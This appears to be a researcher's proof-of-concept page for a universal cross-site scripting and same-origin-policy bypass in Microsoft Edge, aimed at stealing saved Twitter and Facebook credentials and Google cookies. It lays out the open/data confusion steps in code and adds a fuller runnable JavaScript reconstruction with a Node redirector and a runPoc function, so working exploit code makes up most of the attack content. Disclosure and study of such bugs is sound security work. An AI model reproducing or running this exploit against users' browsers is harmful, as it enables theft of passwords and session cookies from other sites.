UXSS/SOP bypass on Microsoft Edge
Open/Data confusion

PROOF OF CONCEPT

The first two PoCs assume that the user has a Twitter/Facebook account with the Edge password manager enabled (the default). The same can be done against PayPal, your favorite bank, or most sites on the planet: the technique only needs the target page to contain an iframe, because it works by changing the location of the target's first frame.


  1. Steal Twitter Credentials (nothing is sent to the net)

  2. Steal Facebook Credentials (nothing is sent to the net)

  3. Get Google Cookies

  4. Spoof the Referrer as microsoft.com

Blog: UXSS/SOP bypass - Stealing Credentials Pretty Fast!

Watch the Video - UXSS/SOP bypass on Microsoft Edge

QUICK DESCRIPTION
  1. Open a new window with a server redirect to the target site
     w=window.open("redir.php?URL=https://www.twitter.com","WIN1");

  2. Save a self-reference in the new window itself
     w.Math.top = w; // Cache in any JS built-in object

  3. Immediately open a javascript: URL in the same named window, while it is still on redir.php
     window.open("javascript:alert('Click once target starts loading');" +
                 "Math.top[0].location='data:text/html,ALMOST_TOP_CONTEXT';", "WIN1");
The final step executes the javascript: URL in the context of the previous page (redir.php); however, when the cached top (Math.top) is used to change the location of the first iframe, Edge thinks the statement is really coming from the top. In other words, it believes the top page (now Twitter) is changing the URL of its own iframe.

We can abuse this by setting a data: URI which, after a couple of tricks (read the post), ends up running in the top context/domain.
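The three steps above, reconstructed as an added JavaScript example; this is not the original PoC code, which is not reproduced on this page. The attacker-side functions build the redirect URL and the javascript: URL exactly as the steps describe and drive the two window.open calls; redirectLocationFor/startRedirector are an assumed Node stand-in for redir.php (its source is not on the page), and the host name, port and the jsStringLiteral helper are assumptions of this example. Unlike the one-liner above, the target URL is percent-encoded into the URL parameter and quotes in the data: payload are escaped, so the payload survives as a single JS string literal.

```javascript
// Added example: reconstruction of the "open/data confusion" sequence.
// Not the original PoC; redir.php is replaced by an assumed Node redirector.

// --- Server side: stand-in for redir.php (assumed) -------------------------
// Returns the Location a redirector would send for a request such as
// "/redir.php?URL=https://www.twitter.com", or null when URL is missing.
function redirectLocationFor(requestUrl, base = 'http://attacker.example') {
  return new URL(requestUrl, base).searchParams.get('URL');
}

// Minimal 302 redirector; only needed when serving the PoC for real.
function startRedirector(port) {
  const http = require('http');
  return http.createServer((req, res) => {
    const target = redirectLocationFor(req.url);
    if (!target) { res.statusCode = 400; return res.end('missing URL'); }
    res.statusCode = 302;
    res.setHeader('Location', target);
    res.end();
  }).listen(port);
}

// --- Client side: the three steps ----------------------------------------
// Step 1: redirector URL that will forward WIN1 to the target.
function buildRedirectUrl(target) {
  return 'redir.php?URL=' + encodeURIComponent(target);
}

// Wrap a value as a single-quoted JS string literal for use inside a
// javascript: URL. Quotes and backslashes are backslash-escaped; browsers
// percent-decode a javascript: URL before running it, so a literal '%' in
// the payload must travel as '%25' or it would be consumed at that stage.
function jsStringLiteral(s) {
  return "'" + s.replace(/\\/g, '\\\\').replace(/'/g, "\\'").replace(/%/g, '%25') + "'";
}

// Step 3: javascript: URL run in WIN1 while it still shows redir.php.
// Math.top was cached in step 2; Math.top[0] is the first frame of whatever
// document ends up in WIN1 (the target). Assigning its location a data: URL
// is the statement Edge mis-attributes to the target's top document.
function buildJavascriptUrl(dataUrl) {
  return 'javascript:' +
    "alert('Click once target starts loading');" +
    'Math.top[0].location=' + jsStringLiteral(dataUrl) + ';';
}

// Runs the sequence against a window-like object (the browser's window by
// default). Returns the WIN1 handle.
function runPoc(target, dataUrl, win = globalThis.window) {
  if (!win || typeof win.open !== 'function') {
    throw new Error('runPoc needs a browser window');
  }
  const w = win.open(buildRedirectUrl(target), 'WIN1');  // step 1
  w.Math.top = w;                                         // step 2: cache self-reference
  win.open(buildJavascriptUrl(dataUrl), 'WIN1');          // step 3: javascript: in WIN1
  return w;
}
```

In a browser, calling runPoc('https://www.twitter.com', 'data:text/html,ALMOST_TOP_CONTEXT') from a page served next to the redirector reproduces the three steps; outside a browser only the URL builders and the redirector logic are exercised. The escaping in jsStringLiteral is the practical difference from the one-liner in the steps: a data: payload that contains quotes or percent-encoded characters breaks the javascript: string literal unless it is escaped with the javascript: URL's decoding in mind.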
BlogPost: UXSS/SOP bypass - Stealing Credentials Pretty Fast!

Tested on: Microsoft Edge fully patched [2017/05/10]
Questions? Tweet me here: @magicmac2000